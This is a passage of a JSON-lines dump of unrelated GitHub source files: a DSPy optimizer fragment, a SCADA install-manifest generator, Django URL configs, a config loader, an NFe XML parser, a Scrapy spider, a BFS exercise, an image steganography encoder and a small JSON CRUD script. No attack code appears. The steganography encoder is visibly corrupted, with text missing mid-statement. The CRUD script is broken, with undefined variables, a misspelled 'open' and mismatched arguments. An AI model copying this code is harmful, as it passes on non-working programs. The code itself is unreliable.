We can't just use the unused nor the unaugmented (validation) ones.\n augmented_uuids = set([x.dspy_uuid for x in augmented_demos])\n raw_demos_uuids = set([x.dspy_uuid for x in predictor.traces if x.dspy_uuid not in augmented_uuids])\n\n raw_demos = [x for x in self.trainset if x.dspy_uuid in raw_demos_uuids]\n raw_demos = rng.sample(raw_demos, min(self.max_labeled_demos - len(augmented_demos), len(raw_demos)))\n\n print(f'Got {len(augmented_demos)} augmented demos and {len(raw_demos)} raw demos.')\n predictor.demos = augmented_demos + raw_demos\n \n evaluate = Evaluate(devset=self.validation, metric=self.metric, num_threads=self.num_threads, display_table=False, display_progress=True)\n score = evaluate(program)\n\n print('Score:', score, 'for set:', [len(predictor.demos) for predictor in program.predictors()])\n # dsp.settings.lm.inspect_history(n=1)\n\n return (score, program)\n\n def _train(self):\n for name, predictor in self.student.named_predictors():\n predictor.traces = self.name2traces[name]\n pass\n\n self.candidate_sets = []\n\n for candidate_set_idx in range(self.num_candidate_sets):\n score, program = self._random_search_instance(candidate_set_idx)\n self.candidate_sets.append((score, program))\n \n best_score, best_program = max(self.candidate_sets, key=lambda x: x[0])\n print('Best score:', best_score)\n\n return best_program\n\n\n\n\n# sample between 4 and 10 examples from traces\n# TODO: FIXME: The max number of demos should be determined in part by the LM's tokenizer + max_length.\n# This does require excecuting the program, or at least the predictor.\n# # # # # # (Actually we can just combine the token counts of the traces, when formatted via signature/adapter).\n# Alternatively, we can keep track of the (zero-shot) number of tokens when we bootstrap.\n# As another option, we can just try a wide range and handle failures as penalties on the score.\n# The number \"24\" of traces to collect can also be affected. 
If we only need 3x10, some overlap is ok.\n# We can also consider having short_demos and long_demos.\n", "repo_name": "son1128/dspy", "sub_path": "dspy/teleprompt/random_search.py", "file_name": "random_search.py", "file_ext": "py", "file_size_in_byte": 5886, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "bootstrap.BootstrapFewShot", "line_number": 35, "usage_type": "name"}, {"api_name": "random.Random", "line_number": 64, "usage_type": "call"}, {"api_name": "dspy.evaluate.evaluate.Evaluate", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "13674400999", "text": "import json\nimport os\nimport sys\n\n# list files in a directory\ndef list_files(path):\n list = []\n\n for (root, dirs, files) in os.walk(path):\n for f in files:\n list.append((root[2:] + \"/\" + f).replace('\\\\','/'))\n\n return list\n\n# get size of all files in a directory\ndef dir_size(path):\n total = 0\n\n for (root, dirs, files) in os.walk(path):\n for f in files:\n total += os.path.getsize(root + \"/\" + f)\n\n return total\n\n# get the version of an application at the provided path\ndef get_version(path, is_lib = False):\n ver = \"\"\n string = \".version = \\\"\"\n\n if not is_lib:\n string = \"_VERSION = \\\"\"\n\n f = open(path, \"r\")\n\n for line in f:\n pos = line.find(string)\n if pos >= 0:\n ver = line[(pos + len(string)):(len(line) - 2)]\n break\n\n f.close()\n\n return ver\n\n# generate installation manifest object\ndef make_manifest(size):\n manifest = {\n \"versions\" : {\n \"installer\" : get_version(\"./ccmsi.lua\"),\n \"bootloader\" : get_version(\"./startup.lua\"),\n \"common\" : get_version(\"./scada-common/util.lua\", True),\n \"comms\" : get_version(\"./scada-common/comms.lua\", True),\n \"graphics\" : get_version(\"./graphics/core.lua\", True),\n \"lockbox\" : get_version(\"./lockbox/init.lua\", True),\n \"reactor-plc\" : get_version(\"./reactor-plc/startup.lua\"),\n \"rtu\" : get_version(\"./rtu/startup.lua\"),\n \"supervisor\" : get_version(\"./supervisor/startup.lua\"),\n \"coordinator\" : get_version(\"./coordinator/startup.lua\"),\n \"pocket\" : get_version(\"./pocket/startup.lua\")\n },\n \"files\" : {\n # common files\n \"system\" : [ \"initenv.lua\", \"startup.lua\", \"configure.lua\", \"LICENSE\" ],\n \"common\" : list_files(\"./scada-common\"),\n \"graphics\" : list_files(\"./graphics\"),\n \"lockbox\" : list_files(\"./lockbox\"),\n # platform files\n \"reactor-plc\" : list_files(\"./reactor-plc\"),\n \"rtu\" : list_files(\"./rtu\"),\n \"supervisor\" : list_files(\"./supervisor\"),\n \"coordinator\" : list_files(\"./coordinator\"),\n \"pocket\" : list_files(\"./pocket\"),\n },\n \"depends\" : {\n \"reactor-plc\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ],\n \"rtu\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ],\n \"supervisor\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ],\n \"coordinator\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ],\n \"pocket\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ]\n },\n \"sizes\" : {\n # manifest file estimate\n \"manifest\" : size,\n # common files\n \"system\" : os.path.getsize(\"initenv.lua\") + os.path.getsize(\"startup.lua\") + os.path.getsize(\"configure.lua\"),\n \"common\" : dir_size(\"./scada-common\"),\n \"graphics\" : dir_size(\"./graphics\"),\n \"lockbox\" : dir_size(\"./lockbox\"),\n # platform files\n \"reactor-plc\" : dir_size(\"./reactor-plc\"),\n \"rtu\" : dir_size(\"./rtu\"),\n \"supervisor\" : 
dir_size(\"./supervisor\"),\n \"coordinator\" : dir_size(\"./coordinator\"),\n \"pocket\" : dir_size(\"./pocket\"),\n }\n }\n\n return manifest\n\n# write initial manifest with placeholder size\nf = open(\"install_manifest.json\", \"w\")\njson.dump(make_manifest(\"-----\"), f)\nf.close()\n\nmanifest_size = os.path.getsize(\"install_manifest.json\")\n\nfinal_manifest = make_manifest(manifest_size)\n\n# calculate file size then regenerate with embedded size\nf = open(\"install_manifest.json\", \"w\")\njson.dump(final_manifest, f)\nf.close()\n\nif len(sys.argv) > 1 and sys.argv[1] == \"shields\":\n # write all the JSON files for shields.io\n for key, version in final_manifest[\"versions\"].items():\n f = open(\"./deploy/\" + key + \".json\", \"w\")\n\n if version.find(\"alpha\") >= 0:\n color = \"yellow\"\n elif version.find(\"beta\") >= 0:\n color = \"orange\"\n else:\n color = \"blue\"\n\n json.dump({\n \"schemaVersion\": 1,\n \"label\": key,\n \"message\": \"\" + version,\n \"color\": color\n }, f)\n\n f.close()\n", "repo_name": "MikaylaFischler/cc-mek-scada", "sub_path": "imgen.py", "file_name": "imgen.py", "file_ext": "py", "file_size_in_byte": 4296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 85, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 9, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 114, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "73754767206", "text": "from os import path\nfrom setuptools import setup\n\nwith open(path.join(path.dirname(path.abspath(__file__)), 'README.rst')) as f:\n readme = f.read()\n\nsetup(\n name = 'metadata_burn',\n version = '0.1',\n description = 'An app to add metadata to a PNG image',\n long_description = readme,\n author = 'John Pastore',\n author_email = 'dev@babyMRI.org',\n url = 'http://wiki',\n packages = ['metadata_burn'],\n install_requires = ['chrisapp'],\n test_suite = 'nose.collector',\n tests_require = ['nose'],\n license = 'MIT',\n zip_safe = False,\n python_requires = '>=3.6',\n entry_points = {\n 'console_scripts': [\n 'metadata_burn = metadata_burn.__main__:main'\n ]\n }\n)\n", "repo_name": "FNNDSC/pl-metadata-burn", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 826, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 4, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "28597585058", "text": "from django.urls import path, re_path\nfrom .views 
import *\n\nurlpatterns = [\n path('', Home.as_view(), name='home'),\n path('about/', about, name='about'),\n path('add_page/', add_page, name='add_product'),\n path('contact/', contact, name='contact'),\n path('login/', LoginUser.as_view(), name='login'),\n path('logout/', logout_user, name='logout'),\n path('register/', RegisterUser.as_view(), name='register'),\n path('product/', show_prod.as_view(), name='prod'),\n path('category/', Category.as_view(), name='category'),\n]", "repo_name": "grustniyebalnik/djlast", "sub_path": "coolsite/equipment/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 576, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "30768100331", "text": "# -*- coding: utf-8 -*-\n\nfrom backports import configparser\n# from bs4 import BeautifulSoup\nimport xmltodict\nimport json\nimport yaml\n\nimport os\n\n__version__ = \"0.0.1\"\n__all__ = ['load']\n\nclass Loader(object):\n # TODO: load from other sources like, remote http, ssh, stream\n def getFileContent(self, file_path):\n content = None\n if not os.path.isfile(file_path):\n raise Exception(\"{} not found\".format(file_path))\n with open(file_path) as _input:\n content =_input.read()\n return content\n\nclass Config(object):\n\n def __init__(self):\n pass\n\nclass Configurator(object):\n required = set()\n def __init__(self, configFile, _format, required=[], keysMapping={}):\n self.configFile = configFile\n self.format = _format\n self.configObj = None\n self.loaderObj = Loader()\n self.required = set(required)\n self.__mappedKeys = keysMapping\n\n def getConfigDict(self):\n if self.format == \"json\":\n self.configObj = self.__parseJson()\n elif self.format == \"yaml\":\n self.configObj = self.__parseYaml()\n elif self.format == \"ini\":\n self.configObj = self.__parseIni()\n elif self.format == \"xml\":\n self.configObj = self.__parseXml()\n else:\n raise Exception(\"Not valid format\")\n return self.configObj\n\n def getConfigObj(self):\n configObj = Config()\n self.getConfigDict()\n for k,v in self.configObj.items():\n setattr(configObj,k,v)\n return configObj\n\n def __parseIni(self):\n conf = configparser.ConfigParser()\n conf.read(self.configFile)\n return self.__processIni(conf)\n\n def __parseJson(self):\n content = self.loaderObj.getFileContent(self.configFile)\n conf = json.loads(content)\n return conf\n\n def __parseXml(self):\n content = self.loaderObj.getFileContent(self.configFile)\n conf = xmltodict.parse(content)\n return conf\n\n def __parseYaml(self):\n content = self.loaderObj.getFileContent(self.configFile)\n conf = yaml.load(content, Loader=yaml.FullLoader)\n return conf\n\n def __processIni(self, conf):\n result = {}\n validating_sections = list(self.required.difference(set(conf.sections())))\n if not validating_sections:\n for 
section in conf.sections():\n # print \"Section : \",section\n result[section] = dict(conf.items(section))\n if section in self.__mappedKeys:\n for item in self.__mappedKeys[section]:\n _key = item[\"key\"]\n if conf.has_option(section,_key):\n result[section][_key] = item[\"mapping\"](conf.get(section,_key))\n # setattr(result, section.upper(), item[\"mapping\"](conf.get(section,_key)))\n continue\n \n # setattr(result,section,dict(conf.items(section)))\n else:\n raise AttributeError('Some sections are missing', *sections)\n return result\n\n\ndef load(file_path,type_file, mapping, asDict=True):\n # TODO: Make all the params and return always a dict or custum dict like object\n configuration = Configurator(file_path,type_file,keysMapping=mapping)\n if asDict:\n return configuration.getConfigDict()\n return configuration.getConfigObj()", "repo_name": "Al3jandr032/statuto", "sub_path": "statuto/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 3458, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.isfile", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "backports.configparser.ConfigParser", "line_number": 60, "usage_type": "call"}, {"api_name": "backports.configparser", "line_number": 60, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 66, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 71, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 76, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 76, "usage_type": "attribute"}]} +{"seq_id": "38276799543", "text": "from datetime import date\nimport xml.etree.ElementTree as ET\n\ndef elem(tree, *children, **kwargs):\n ns = \"{%s}\" % kwargs.get('ns', \"http://www.portalfiscal.inf.br/nfe\")\n return tree.find('/'.join([\"%s%s\" % (ns, child) for child in children]))\n\ndef iterelem(tree, *children, **kwargs):\n ns = \"{%s}\" % kwargs.get('ns', \"http://www.portalfiscal.inf.br/nfe\")\n return tree.iterfind('/'.join([\"%s%s\" % (ns, child) for child in children]))\n\n\ndef parse_nfe_document(filename):\n doc = {}\n\n tree = ET.parse(filename)\n xinfNFe = elem(tree, \"NFe\", \"infNFe\")\n\n version = float(xinfNFe.get(\"versao\"))\n f = {'id': \"ide\", 'number': \"nNF\", 'date': \"dhEmi\",\n 'sup': \"emit\", 'sup.cnpj': \"CNPJ\", 'sup.name': \"xNome\",\n 'detail': \"det\", 'prod': \"prod\", 'prod.name': \"xProd\",\n 'prod.qnt': \"qCom\"}\n if version == 3.1:\n pass\n elif version == 2.0:\n f.update({'date': \"dEmi\"})\n\n xid = elem(xinfNFe, f['id'])\n doc['number'] = int(elem(xid, f['number']).text)\n doc['date'] = date(*map(int, elem(xid, f['date']).text[0:10].split('-')))\n\n xsup = elem(xinfNFe, f['sup'])\n doc['supplier.cnpj'] = elem(xsup, f['sup.cnpj']).text\n doc['supplier.name'] = elem(xsup, f['sup.name']).text\n\n doc['products'] = products = []\n for xprod in iterelem(xinfNFe, f['detail'], f['prod']):\n prod = {'name': elem(xprod, f['prod.name']).text,\n 'qnt': int(float(elem(xprod, f['prod.qnt']).text))}\n products.append(prod)\n\n return doc\n", "repo_name": "wagnerluis1982/serialnumbers", "sub_path": "serialnumber/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1507, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 16, 
"usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 16, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "3344349083", "text": "from django.urls import path, include\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token, verify_jwt_token\nfrom testApp.views import (\n RegisterView,\n ContactCreateAPIView,\n ContactListAPIView,\n ContactRetrieveAPIView,\n ContactUpdateAPIView,\n ContactDestroyAPIView,\n GroupAdd,\n GroupDetailView,\n GroupView,\n)\n\nurlpatterns = [\n # Login APIs\n path(\"register/\", RegisterView.as_view(), name=\"auth_register\"),\n path(\"auth-jwt/\", obtain_jwt_token),\n path(\"auth-jwt-refresh/\", refresh_jwt_token),\n path(\"auth-jwt-verify/\", verify_jwt_token),\n # Contact APIs\n path(\"create-contact/\", ContactCreateAPIView.as_view(), name=\"create-contact\"),\n path(\"contacts/\", ContactListAPIView.as_view(), name=\"list-contact\"),\n path(\"contact/\", ContactRetrieveAPIView.as_view(), name=\"retrieve-contact\"),\n path(\"update-contact/\", ContactUpdateAPIView.as_view(), name=\"update-contact\"),\n path(\"delete-contact/\", ContactDestroyAPIView.as_view(), name=\"delete-contact\"),\n # Group APIs\n path(\"group/\", GroupAdd.as_view(), name=\"create-group\"),\n path(\"group/\", GroupDetailView.as_view(), name=\"group_detail\"),\n path(\"groups/\", GroupView.as_view(), name=\"getall-group\"),\n]\n", "repo_name": "prashantboss/bizburd", "sub_path": "testApp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "testApp.views.RegisterView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "testApp.views.RegisterView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.obtain_jwt_token", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.refresh_jwt_token", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.verify_jwt_token", "line_number": 20, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "testApp.views.ContactCreateAPIView.as_view", "line_number": 22, "usage_type": "call"}, {"api_name": "testApp.views.ContactCreateAPIView", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "testApp.views.ContactListAPIView.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "testApp.views.ContactListAPIView", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "testApp.views.ContactRetrieveAPIView.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "testApp.views.ContactRetrieveAPIView", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "testApp.views.ContactUpdateAPIView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "testApp.views.ContactUpdateAPIView", "line_number": 25, 
"usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "testApp.views.ContactDestroyAPIView.as_view", "line_number": 26, "usage_type": "call"}, {"api_name": "testApp.views.ContactDestroyAPIView", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "testApp.views.GroupAdd.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "testApp.views.GroupAdd", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "testApp.views.GroupDetailView.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "testApp.views.GroupDetailView", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "testApp.views.GroupView.as_view", "line_number": 30, "usage_type": "call"}, {"api_name": "testApp.views.GroupView", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "11730217130", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nfrom lscarpy.items import QuotesItem\n\n\nclass QuotesSpider(scrapy.Spider):\n name = 'quotes'\n allowed_domains = ['quotes.toscrape.com']\n start_urls = ['http://quotes.toscrape.com/']\n\n def parse(self, response):\n quotes = response.css('.quote')\n item = QuotesItem()\n for quote in quotes:\n item['text'] = quote.css('.text::text').extract_first()\n item['author'] = quote.css('.author::text').extract_first()\n item['tags'] = quote.css('.tags .tag::text').extract()\n yield item\n\n next_page = response.css('.pager .next a::attr(\"href\")').extract_first()\n next_url = response.urljoin(next_page)\n if next_url is not None:\n yield response.follow(next_page, self.parse)\n", "repo_name": "nobodyLee/LearningScrapy", "sub_path": "lscarpy/lscarpy/spiders/quotes.py", "file_name": "quotes.py", "file_ext": "py", "file_size_in_byte": 805, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scrapy.Spider", "line_number": 6, "usage_type": "attribute"}, {"api_name": "lscarpy.items.QuotesItem", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "2036917708", "text": "\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n'***************************** Jewel Mahmud *****************************'\n'***************************** CSE-13th,MBSTU *****************************'\n'***************************** Date: 13-08-2022 *****************************'\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n#problem name: Prepare>Algorithms>Graph Theory>Breadth First Search: Shortest Reach\n#problem link: https://www.hackerrank.com/challenges/bfsshortreach/problem\n\nfrom collections import defaultdict\n\nqueue = [] # Initialize a queue\ndef bfs(visited, queue, graph, root, num_of_node): # function for BFS\n visited.append(root)\n queue.append(root)\n level=[None]*(num_of_node+1)\n level[root]=0\n while queue: # Creating loop to visit each node\n m = queue.pop(0)\n # print(m, end=\" \")\n\n for neighbour in graph[m]:\n if neighbour not in visited:\n level[neighbour]=level[m]+1\n visited.append(neighbour)\n queue.append(neighbour)\n return level\n# main code \nTEST=int(input())\nfor _ in range(TEST):\n 
graph=defaultdict(list)\n num_of_node, num_of_edge=map(int, input().split())\n for _ in range(num_of_edge):\n u,v=map(int, input().split())\n if u not in graph[v]:\n graph[v].append(u)\n if v not in graph[u]:\n graph[u].append(v)\n root=int(input())\n # print(graph)\n visited=[]\n queue = [] # Initialize a queue\n level=bfs(visited, queue, graph, root, num_of_node)\n # print(level)\n for i in range(1,num_of_node+1):\n if i==root:\n continue\n elif level[i]==None:\n print('-1', end=' ')\n else:\n print(level[i]*6, end=' ')\n print(end='\\n')", "repo_name": "MahmudJewel/Hackerrank-my-solution", "sub_path": "Problem_solving/Graph Theory/Breadth First Search: Shortest Reach.py", "file_name": "Breadth First Search: Shortest Reach.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "41355426362", "text": "from PIL import Image\nimport os\nimport cast_function as cs\nimport seed\nimport random_seed as rs\nimport sys\nimport file_reader as fr\n\n\n\ndef HYS_encoding(image_path, message):\n # insert metadata to the image\n seed_val = seed.set_meta(image_path,rs.get_random_seed())\n\n\n new_image_path = image_path[:-4]+\"_seed.png\"\n im = Image.open(new_image_path)\n pixel_amount = im.size[0]*im.size[1]\n\n jump_list = rs.generate_random_list(int(im.text.get('Number')),pixel_amount)\n\n\n list = [0] * pixel_amount\n\n i=0\n pixel_summer=0\n\n while inumber_of_chars:\n my_str = my_str[:my_str-number_of_chars]\n #my_str = \"Hello Haiel How are you?\"\n\n my_str += \"$^$\"\n\n # print(\"my str len:\" + str(len(my_str)))\n\n my_char_place = 0 # the current index of my_str\n my_char = my_str[my_char_place] # the current char of my str the loop hides it now.\n my_bin = cs.char_to_binary(my_char) # the current char in binary 8 bits\n my_point = 0 # the current index of my bin in hiding loop.\n\n flag = 0 # flag = 0 - still hiding, flag = 1 - regular copy\n new_matrix = []\n j = -1\n\n index = 0\n\n for pixel in my_matrix_image:\n\n if my_point == 8:\n my_char_place += 1\n if my_char_place >= len(my_str):\n flag = 1\n\n if flag == 0:\n my_char = my_str[my_char_place]\n my_bin = cs.char_to_binary(my_char)\n my_point = 0\n\n new_matrix.append([])\n j += 1\n if list[index] == 1:\n for i in pixel:\n bin_i = cs.integer_to_binary(i)\n\n if flag == 0:\n if my_bin[my_point] != bin_i[7]:\n bin_i = bin_i[:7] + my_bin[my_point]\n new_matrix[j].append(int(bin_i, 2))\n else:\n new_matrix[j].append(int(bin_i, 2))\n my_point += 1\n else:\n new_matrix[j].append(int(bin_i, 2))\n\n if my_point == 8:\n my_char_place += 1\n if my_char_place < len(my_str):\n my_char = my_str[my_char_place]\n my_bin = cs.char_to_binary(my_char)\n my_point = 0\n else:\n flag = 1\n else:\n new_matrix[j] = pixel\n\n index += 1\n new_matrix[j] = tuple(new_matrix[j])\n\n new_im = Image.new(im.mode, im.size)\n new_im.putdata(new_matrix)\n new_im.save(new_image_path[:-4] + \"_temp.png\")\n\n im = seed.set_sec_meta(new_image_path[:-4] + \"_temp.png\",seed_val)\n\n try:\n\n os.remove(new_image_path[:-4]+\"_seed.png\")\n os.remove(new_image_path[:-4] + \"_temp.png\")\n except:\n pass\n return im\n# def main(image_path):\n#\n# HYS_encoding(image_path)\n#\n# main(sys.argv[1])\n\n", "repo_name": "HaielDahan/HYSecretsProject", "sub_path": "HYS_en.py", "file_name": "HYS_en.py", "file_ext": "py", "file_size_in_byte": 3408, "program_lang": "python", 
"lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "seed.set_meta", "line_number": 13, "usage_type": "call"}, {"api_name": "random_seed.get_random_seed", "line_number": 13, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 17, "usage_type": "name"}, {"api_name": "random_seed.generate_random_list", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 41, "usage_type": "name"}, {"api_name": "cast_function.char_to_binary", "line_number": 56, "usage_type": "call"}, {"api_name": "cast_function.char_to_binary", "line_number": 74, "usage_type": "call"}, {"api_name": "cast_function.integer_to_binary", "line_number": 81, "usage_type": "call"}, {"api_name": "cast_function.char_to_binary", "line_number": 97, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 107, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 107, "usage_type": "name"}, {"api_name": "seed.set_sec_meta", "line_number": 111, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 115, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "75363056804", "text": "di={}\r\n\r\nimport json\r\n\r\ndef additem(unid,data):\r\n with open(\"fil.json\",'w') as file:\r\n di[unid] = data\r\n json.dump(di,f)\r\n return (\"success\")\r\n\r\ndef retrivedata(unid):\r\n with open(\"file.json\",\"w\") as file:\r\n if unid in di:\r\n di = json.load(f)\r\n return di\r\n raise json.decoder.JSONDecodeError(\"invalid inpur\")\r\n\r\ndef updatedata(inid,new_data):\r\n with opem(\"file.json\",\"w+\") as f:\r\n if unid in di:\r\n di[unid] = new_data\r\n json.dump(di,f)\r\n return (\"updated sucessfully\")\r\n raise json.decoder.JSONDecodeError(\"invalid operation\")\r\n\r\ndef deletedata(data,target):\r\n with open(\"file.json\",\"w+\"):\r\n if unid in di:\r\n del di[unid]\r\n return(\"deleted successfully\")\r\n raise json.decoder.JSONDecodeError\r\n\r\n\r\n\r\nwhile True:\r\n print(\"Welcome \\nto add data pres 1\\nto retrive data pres 2\\n\"\r\n \"to update data pres 3\\nto delete data pres 4\\nto quit pres 5\\n\"\r\n )\r\n\r\n if choice == '1':\r\n unid = max(di.values(), default=0)+1\r\n print(F\"your key is:{unid}\")\r\n data = input(\"enter data you want to add: \")\r\n print(additem(unid,data))\r\n if choice == '2':\r\n unid = int(input(\"enter the data id you want to retrive: \"))\r\n print(retrivedata(unid))\r\n if choice == '3':\r\n unid = int(input(\"enter the data id you want to change: \"))\r\n new_data = input(\"enter the data you wnat to update\")\r\n print(updatedata(unid,data))\r\n if choice == '4':\r\n unid = int(input(\"enter the id of the data you want to delete: \"))\r\n print(deletedata(unid))\r\n if choice == '5':\r\n print(\"exiting the program\")\r\n break", "repo_name": "vardges97/Tasks", "sub_path": "jasonoftheargonauts.py", "file_name": "jasonoftheargonauts.py", "file_ext": "py", "file_size_in_byte": 1727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dump", "line_number": 8, "usage_type": "call"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "json.decoder.JSONDecodeError", "line_number": 16, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 16, "usage_type": 
"attribute"}, {"api_name": "json.dump", "line_number": 22, "usage_type": "call"}, {"api_name": "json.decoder.JSONDecodeError", "line_number": 24, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.decoder", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "20840464161", "text": "from django.urls import path\nfrom .views import ArticleList, ArticleDetail, CategoryList, AuthorList, ArticlePre\n\napp_name = 'blog'\nurlpatterns = [\n # default url\n path('', ArticleList.as_view(), name='home'),\n # url with page id request\n path('page/', ArticleList.as_view(), name='home'),\n path('article/', ArticleDetail.as_view(), name='detail'),\n path('preview/', ArticlePre.as_view(), name='preview'),\n # default url\n path('category/', CategoryList.as_view(), name='category'),\n # url with page id request\n path('category//page/', CategoryList.as_view(), name='category'),\n path('author/', AuthorList.as_view(), name='author'),\n path('author//page/', AuthorList.as_view(), name='author'),\n\n]\n", "repo_name": "MoriZoki/django-blog", "sub_path": "blog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": 